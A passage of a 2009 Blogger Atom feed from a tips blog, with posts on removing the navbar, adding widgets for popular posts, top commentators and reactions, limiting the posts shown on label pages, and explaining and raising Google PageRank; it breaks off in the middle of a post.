href="http://4.bp.blogspot.com/_tbHfaj1A058/SJ8WWzprWgI/AAAAAAAAEJo/xaRx-wCz6iI/s1600-h/navbar.PNG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_tbHfaj1A058/SJ8WWzprWgI/AAAAAAAAEJo/xaRx-wCz6iI/s400/navbar.PNG" alt="" id="BLOGGER_PHOTO_ID_5232925873105754626" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There are lots of features avaiable with this navbar like -&lt;br /&gt;&lt;ul&gt;&lt;li&gt;A search blog box&lt;/li&gt;&lt;li&gt;Flag the content in the blog option.&lt;/li&gt;&lt;li&gt;Next Blog option.&lt;/li&gt;&lt;li&gt;If you are signed into your blogger account,then Dashboard and Signout option.&lt;/li&gt;&lt;/ul&gt;Though it's quite useful for the blog users,some blogger want to remove the navbar mostly for the reason of improving the look of the blog.&lt;br /&gt;&lt;br /&gt;So, here's step-to-step guide on how to remove default Blogger navbar -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP I - &lt;/span&gt;Login to Blogger &gt; Layout &gt; Edit HTML.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP II -&lt;/span&gt; Now copy the following code - &lt;blockquote&gt;#navbar-iframe {&lt;br /&gt;visibility: hidden;&lt;br /&gt;}&lt;/blockquote&gt;&lt;span style="font-weight: bold;"&gt;STEP III -&lt;/span&gt; Place the above code anywhere below this tag  -&lt;blockquote&gt;&amp;lt;head&amp;gt;&lt;/blockquote&gt; &lt;span style="font-weight: bold;"&gt;STEP IV -&lt;/span&gt; Save template.&lt;br /&gt;&lt;br /&gt;That's it you have successfully removed the Default Blogger Navbar.Check your Blog.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1486040661683374233?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1486040661683374233/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1486040661683374233' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1486040661683374233'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1486040661683374233'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-remove-default-top-navbar-from.html' title='How to remove the default top navbar from Blogger Blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_tbHfaj1A058/SJ8WWzprWgI/AAAAAAAAEJo/xaRx-wCz6iI/s72-c/navbar.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4965406935043924533</id><published>2009-07-26T10:16:00.003-07:00</published><updated>2009-07-26T10:16:01.419-07:00</updated><title type='text'>How to Add Popular Posts widget to Blogger Blogs ?</title><content type='html'>Many of the Bloggers want to show their users list of the Most Popular posts on their blog.Many such "Popular Posts" widgets have been available for Wordpress blogs but there was none available for Blogger blogs.&lt;br /&gt;&lt;br /&gt;Recently one such widget have been devised for Blogger.It is based on the number of comments each post gets.So,the most commented post will be the Most Popular Post of your Blogger Blog.The script checks last 5000 comments made on your blog,and displays the post titles with their URL's followed by no. of comments in bracket,in the descending order of their popularity.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;How to install this Popular Posts widget on your blog?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Below is a quick installer,just enter the values for "Widget Title" and "Blog URL",click "Customize" and "Add to my Blog".&lt;br /&gt;&lt;p&gt;&lt;iframe src="http://free.blogger.help.googlepages.com/topcommentatorwidget.htm" frameborder="0" height="300" scrolling="auto" width="100%"&gt;&lt;/iframe&gt;&lt;/p&gt;&lt;br /&gt;Once you click "Add to my Blog" button,you will be directed to the Widget installer page,where you can select on which of your Blogger Blogs the Popular Posts widget is to be installed.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;P.S. -&lt;/span&gt; Please do not add "http://" while adding your blogs url in the above form,or your Popular Posts widget will not work.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4965406935043924533?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4965406935043924533/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4965406935043924533' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4965406935043924533'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4965406935043924533'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-popular-posts-widget-to.html' title='How to Add Popular Posts widget to Blogger Blogs ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3650755447866117007</id><published>2009-07-26T10:16:00.001-07:00</published><updated>2009-07-26T10:16:00.353-07:00</updated><title type='text'>How to add Top Commentators widget to Blogger blog ?</title><content type='html'>Again a very popular Wordpress plugin - Top Commentators,is now available for Blogger.&lt;br /&gt;&lt;br /&gt;Here is a widget which displays a list of 10 readers of your blog who comment more often.This is a very helpful method to encourage your readers to comment on your blog.&lt;br /&gt;&lt;br /&gt;This widget processes last 500 comments on your blog and displays them in descending order of commenting frequency.&lt;br /&gt;&lt;br /&gt;Again, below is a quick installer,just fill in the values for your blog , add your name in the 'Filter your name' option , click 'Customize' and finally 'Add to Blog'.&lt;br /&gt;&lt;p&gt;&lt;iframe src="http://free.blogger.help.googlepages.com/topcommentatorswidget.html" frameborder="0" height="300" scrolling="auto" width="100%"&gt;&lt;/iframe&gt;&lt;/p&gt;&lt;br /&gt;Once you click 'Add to Blog' button, you will directed to Blogger Widget Installer page.&lt;br /&gt;&lt;br /&gt;Just select the Blog where you want to add Top Commentator widget and install it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;P.S. - &lt;/span&gt;Please do not add "http://" while adding your blogs url in the above form,or your Popular Posts widget will not work.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3650755447866117007?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3650755447866117007/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3650755447866117007' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3650755447866117007'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3650755447866117007'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-top-commentators-widget-to.html' title='How to add Top Commentators widget to Blogger blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7664464927933830230</id><published>2009-07-26T10:15:00.063-07:00</published><updated>2009-07-26T10:15:59.156-07:00</updated><title type='text'>How to show only specific number of posts in Labels page for Blogger ?</title><content type='html'>Whenever you click on any of the labels on the Blogger blog,it displays all the posts made under that label. This is by default in Blogger.&lt;br /&gt;&lt;br /&gt;But many Bloggers want to show only specific number of posts on their labels page like 2 or 3 or 4 etc.&lt;br /&gt;&lt;br /&gt;Here is a step-by-step guide on how to show only specific number of posts on the labels page in Blogger -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP I - &lt;/span&gt;First of all install a labels widget on your blog if you haven't installed it yet.(It's available in the "Add Page Element" menu.)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP II - &lt;/span&gt;Goto - Layout &gt; Edit HTML &gt; Expand Widget Templates.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP III -&lt;/span&gt; Find this code -&lt;blockquote&gt;&amp;lt;b:widget id='Label&lt;span style="color: rgb(255, 0, 0);"&gt;1&lt;/span&gt;' locked='false' title='Labels' type='Label'&amp;gt;&lt;/blockquote&gt;The number in red may be other like 2,3 etc. depending upon how many labels widget you have.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP IV -&lt;/span&gt; Below this widget code,find this -&lt;blockquote&gt; &amp;lt;a expr:dir='data:blog.languageDirection' expr:href='data:label.url'&amp;gt;&lt;br /&gt;        &amp;lt;data:label.name/&amp;gt;&lt;br /&gt;      &amp;lt;/a&amp;gt;&lt;br /&gt;    &amp;lt;/b:if&amp;gt;&lt;br /&gt;    &amp;lt;span dir='ltr'&amp;gt;(&amp;lt;data:label.count/&amp;gt;)&amp;lt;/span&amp;gt;&lt;/blockquote&gt;&lt;span style="font-weight: bold;"&gt;STEP V -&lt;/span&gt; Now replace the above code with this code -&lt;blockquote&gt;  &amp;lt;a expr:dir='data:blog.languageDirection' expr:href='data:label.url +  &amp;amp;quot;?max-results=&lt;span style="color: rgb(255, 0, 0);"&gt;2&lt;/span&gt;&amp;amp;quot;'&amp;gt;&lt;br /&gt;          &amp;lt;data:label.name/&amp;gt;&lt;br /&gt;      &amp;lt;span dir='ltr'&amp;gt;(&amp;lt;data:label.count/&amp;gt;)&amp;lt;/span&amp;gt;&lt;br /&gt;        &amp;lt;/a&amp;gt;&lt;br /&gt;      &amp;lt;/b:if&amp;gt;&lt;/blockquote&gt;The digit in red denotes the number of posts that are to be shown on the labels page,you can enter number of your choice.&lt;br /&gt;&lt;br /&gt;Now Save the Template.&lt;br /&gt;&lt;br /&gt;That's it you have successfully added the Blogger hack for showing only specific number of posts in Labels page for Blogger.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7664464927933830230?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7664464927933830230/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7664464927933830230' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7664464927933830230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7664464927933830230'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-show-only-specific-number-of.html' title='How to show only specific number of posts in Labels page for Blogger ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2772995020072427196</id><published>2009-07-26T10:15:00.061-07:00</published><updated>2009-07-26T10:15:58.277-07:00</updated><title type='text'>Google PageRank explained in a simple way.</title><content type='html'>&lt;img src="http://www.google.com/images/google_sm.gif" images="" gif="" /&gt;&lt;br /&gt;&lt;br /&gt;Everybody using internet is aware of the power of Google.Google is everywhere whether its search engine, email, social networking, online marketing, blogging etc.&lt;br /&gt;&lt;br /&gt;But most important of all these is it's search engine which share approximately 60% of all searches made all over the world.This explains the importance of rank SERP (Search Engine Results Page) fo Google.The higher the ranking on SERP the more free visitors you will get from Google.&lt;br /&gt;&lt;br /&gt;While displaying the results for a particular query Google takes into consideration a lot of factors.&lt;br /&gt;&lt;br /&gt;Two most impotant factors being (&lt;span style="font-style: italic;"&gt;source&lt;/span&gt; - &lt;a href="http://www.google.com/corporate/tech.html"&gt;Google's Corporate Information&lt;/a&gt;) -&lt;br /&gt;&lt;ul&gt;&lt;li&gt;PageRank Technology&lt;/li&gt;&lt;li&gt;Hypertext-Matching Analysis.&lt;/li&gt;&lt;/ul&gt;Now here comes the importance of Google PageRank.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;What is Google PageRank?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;According to Google - &lt;span style="font-style: italic;"&gt;PageRank is Google's view of importance of a webpage&lt;/span&gt;. Pagerank is given out of 10.&lt;br /&gt;&lt;br /&gt;Thus a webpage with a higher pagerank will be more important in view of Google as compared to the one with lower pagerank. Hence, a webpage with a better pagerank will get higher position in the SERP.&lt;br /&gt;e.g. A webpage with Google PageRank of 5/10 will be more important and hence placed higher in Google SERP than the webpage with Google PageRank of 3/10.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;How does Google determines a PageRank for any webpage ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Lets see what Google says -&lt;blockquote&gt;PageRank relies on the uniquely democratic nature of the web by using its vast link structure as an indicator of an individual page's value. In essence, Google interprets a link from page A to page B as a vote, by page A, for page B. But, Google looks at more than the sheer volume of votes, or links a page receives; it also analyzes the page that casts the vote. Votes cast by pages that are themselves "important" weigh more heavily and help to make other pages "important".&lt;/blockquote&gt;So Google takes into account the backlinks each webpage gets from different other webpages. Each backlink a webpage gets is considered as a vote by Google in the favour that webpage. But at the same time Google also analyzes the webpage from which a baclink is given.&lt;br /&gt;&lt;br /&gt;Let's examine the following figure for some better understanding -&lt;br /&gt;&lt;br /&gt;&lt;img src="http://upload.wikimedia.org/wikipedia/commons/thumb/f/fb/PageRanks-Example.svg/400px-PageRanks-Example.svg.png" images="" gif="" /&gt;&lt;br /&gt;&lt;br /&gt;In the above figure A,B,C,D,E and F are different webpages. Here you can see that page C has got a higher pagerank than page E,even though it have fewer links as compared to page E. It's because of the importance of the page from which page C is receiving a link and also the number of outbound links from that page. In the above case as you can see page B has got most importance and is having only one outbound link to page C, so upto 90% of its PageRank is carried to page C.&lt;br /&gt;&lt;br /&gt;In the essence, a page with higher baklinks from quality pages (those with higher pagerank) will have a better pagerank.&lt;br /&gt;&lt;br /&gt;Thus, improving your Google PageRank helps you by getting you more visitors through search engines and ultimately can result into a better revenue from your website/blog.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2772995020072427196?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2772995020072427196/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2772995020072427196' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2772995020072427196'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2772995020072427196'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/google-pagerank-explained-in-simple-way.html' title='Google PageRank explained in a simple way.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-407623082361815700</id><published>2009-07-26T10:15:00.059-07:00</published><updated>2009-07-26T10:15:57.358-07:00</updated><title type='text'>List of useful Blogger Widgets</title><content type='html'>Here a complete list of Widgets available on this blog which you can use modify your Blogger powered blog.&lt;br /&gt;&lt;ol style="font-weight: bold;"&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2008/08/how-to-add-popular-posts-widget-to.html"&gt;Popular Posts Widget.&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2008/08/how-to-add-top-commentators-widget-to.html"&gt;Top Commentator Widget.&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2008/08/how-to-add-search-form-widget-to.html"&gt;Search Form Widget.&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2008/08/how-to-add-recent-posts-widget-to.html"&gt;Recent Posts Widget.&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2008/08/how-to-add-recent-comments-widget-to.html"&gt;Recent Comments Widget.&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2008/12/how-to-add-star-rating-widget-to.html"&gt;Rate the post widget&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2009/05/label-cloud-or-tag-cloud-widget-for.html"&gt;Label / Tag Cloud Widget&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2009/05/adding-meta-tags-is-one-good-procedure.html"&gt;Different meta tags to diffrent posts &lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/2009/05/how-to-add-print-button-to-your-blogger.html"&gt;Print Button Widget&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;Hope you find these widgets useful.&lt;br /&gt;&lt;br /&gt;Feel free to comment if you have any difficulty installing these widgets.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-407623082361815700?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/407623082361815700/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=407623082361815700' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/407623082361815700'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/407623082361815700'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/list-of-useful-blogger-widgets.html' title='List of useful Blogger Widgets'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-95280472971040925</id><published>2009-07-26T10:15:00.057-07:00</published><updated>2009-07-26T10:15:56.259-07:00</updated><title type='text'>How to add the New Reactions feature to Blogger blog ?</title><content type='html'>These days Blogger is adding many new features to their blogs.One of the most recent being the cool Reactions feature.&lt;br /&gt;&lt;br /&gt;It  looks like this -&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_tbHfaj1A058/SKnFX9uxQTI/AAAAAAAAELo/2y6JmiYxqLw/s1600-h/rea1.PNG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_tbHfaj1A058/SKnFX9uxQTI/AAAAAAAAELo/2y6JmiYxqLw/s400/rea1.PNG" alt="" id="BLOGGER_PHOTO_ID_5235933057293304114" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This can be very useful to know immediately what your readers think about the post.&lt;br /&gt;&lt;br /&gt;Here is the ste-by-step guide on how to add this Reactions Feature to your blog -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP I - &lt;/span&gt;Login to - &lt;a href="http://draft.blogger.com/"&gt;Blogger in Draft&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP II - &lt;/span&gt;Goto Layout.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP III -&lt;/span&gt; Now click the "Edit" option in "Blog Posts". It will look like this -&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_tbHfaj1A058/SKnFYBX61QI/AAAAAAAAELw/NML3gkNFbw4/s1600-h/rea33.PNG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_tbHfaj1A058/SKnFYBX61QI/AAAAAAAAELw/NML3gkNFbw4/s400/rea33.PNG" alt="" id="BLOGGER_PHOTO_ID_5235933058271204610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP IV - &lt;/span&gt;Select the checkbox in front of "Reactions". You can add any other text instead of "Reactions" if you want in the box, and also change the text of the options in your reactions.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP V - &lt;/span&gt;Now save that and check your blog.If you don't see the reactions in your post's footer you will have to add some code.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP VI -&lt;/span&gt; Goto &gt; Dashboard &gt; Layout &gt; Edit HTML &gt; Expand Widget Templates.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP VII - &lt;/span&gt;Search for this code -&lt;blockquote&gt;&amp;lt;p class='post-footer-line post-footer-line-1'&amp;gt;&lt;/blockquote&gt;&lt;span style="font-weight: bold;"&gt;STEP VIII - &lt;/span&gt;Just below this code add this code -&lt;blockquote&gt;&lt;span&gt;&amp;lt;span class='reaction-buttons'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;        &amp;lt;b:if cond='data:top.showReactions'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;          &amp;lt;table border='0' cellpadding='0' width='100%'&amp;gt;&amp;lt;tr&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;            &amp;lt;td valign='center'&amp;gt;&amp;lt;span class='reactions-label'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;              &amp;lt;data:top.reactionsLabel/&amp;gt;&amp;lt;/span&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;               &amp;lt;/td&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;            &amp;lt;td&amp;gt;&amp;lt;iframe allowtransparency='true' class='reactions-iframe' expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/&amp;gt;&amp;lt;/td&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;           &amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;        &amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;      &amp;lt;/span&amp;gt;&lt;/span&gt;&lt;/blockquote&gt;Now click "Save Template" and check your blog,it will show the new Reactions Feature at the end of post.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-95280472971040925?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/95280472971040925/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=95280472971040925' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/95280472971040925'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/95280472971040925'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-new-reactions-feature-to.html' title='How to add the New Reactions feature to Blogger blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_tbHfaj1A058/SKnFX9uxQTI/AAAAAAAAELo/2y6JmiYxqLw/s72-c/rea1.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7640299493530440391</id><published>2009-07-26T10:15:00.055-07:00</published><updated>2009-07-26T10:15:55.221-07:00</updated><title type='text'>How to increase Google PageRank of your Blogger Blog ?</title><content type='html'>You would like to read '&lt;a href="http://free-blogger-help.blogspot.com/2008/08/google-pagerank-explained-in-simple-way.html"&gt;What is Google PageRank&lt;/a&gt;?' first.&lt;br /&gt;&lt;br /&gt;Now that you know something about what Google PageRank is, here are some tips for you to increase PageRank of your Blogger blog.&lt;br /&gt;&lt;br /&gt;After reading the article about Google PageRank ,you would have understood that you have to increase the number of quality links to your blog. But at the same time you sholud try avoiding linking to sites that are not related to yours.(e.g your Make Money Online blog linking to any games or any music blog will affect adversely your Google Pagerank.)&lt;br /&gt;&lt;br /&gt;So, here are some popular tactics to increase your Google PageRank -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;1. Reciprocal Link Exchange -&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;      It is the most popular tactic used by the webmasters to increase the pagerank of their sites. Here you exchange links with other blogs of related niche i.e. you place link to a blog on your blog and in turn ask that blog-owner to place your link on his site.&lt;br /&gt;&lt;br /&gt;It can be of two types -&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Two way link exchange or&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Three way link exchange&lt;/li&gt;&lt;/ul&gt;In two way link exchange, you link to the same blog where your link is placed. While in three  way link exchange, you link to one blog and in turn the owner places your link on some other blog but not  on the same blog.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Precautions -&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;The most important one - exchange links with related blogs only.&lt;/li&gt;&lt;li&gt;Avoid excessive link exchange. Google is strictly against excessive reciprocal link exchange.&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-size:130%;"&gt;2. One-way BackLinks -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;It is getting backlinks to your blog without linking that blog in turn. But question is 'How to get quality one-way backlinks?'.&lt;br /&gt;&lt;br /&gt;The simplest answer is 'Write quality content', and if it's really good other bloggers will link back to your blog getting you one-way backlinks.&lt;br /&gt;&lt;br /&gt;The other methods by which you can get quality backlinks are -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;I  - Top Commentator - &lt;/span&gt;Search for blogs with 'Top Commentator' plugin installed(Google for "Top Commentators"). And make some related quality comments on their blog and get placed on thier 'Top Commentator' list.(Usually the links in the "top commentators' list are 'dofollow' in most blogs.)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;II - Comment on Dofollow blogs - &lt;/span&gt;Recently there has been some revolution in blogging and many bloggers have removed the 'nofollow' attribute from their comments,in order to encourage comments on their blog.Now you get a backlink whenever you comment on such 'dofolow' blogs with your url.&lt;br /&gt;           But the tough part is to find the 'dofollow' blogs of related niche.You can Google for terms like "U Comment I Follow',"Dofollow blogs list' etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;III - Posting on Forums - &lt;/span&gt;This one is also very effective.Many forums allow signatures at end of post of user,thus getting you a backlink.But you should take precaution to post on forums related to your niche only,,otherwise it won't help you.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;IV - Submitting to Directories -&lt;/span&gt; This can get you some backlinks,but it's very time-consuming.Also your links are placed very deep not giving you much benefit. The only directory I would recommend is DMOZ, but it's very difficult to get yourself listed at DMOZ.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;V - Submitting to Social Bookmarking Sites - &lt;/span&gt;&lt;span&gt;This one I really missed,thanks 'FADI&lt;/span&gt;' for reminding me about it.What you can do is &lt;a href="http://free-blogger-help.blogspot.com/2008/07/how-to-add-social-bookmarks.html"&gt;add this social bookmarking buttons/script to your blog&lt;/a&gt;, then submit your posts to these bookmarking sites yourself or your readers can submit it. This will get your blog some links,but all these links will be placed deep, thus passing very less pagerank to your blog. But I think something is better than nothing and also these social bookmarking sites can get you some visitors as well.&lt;br 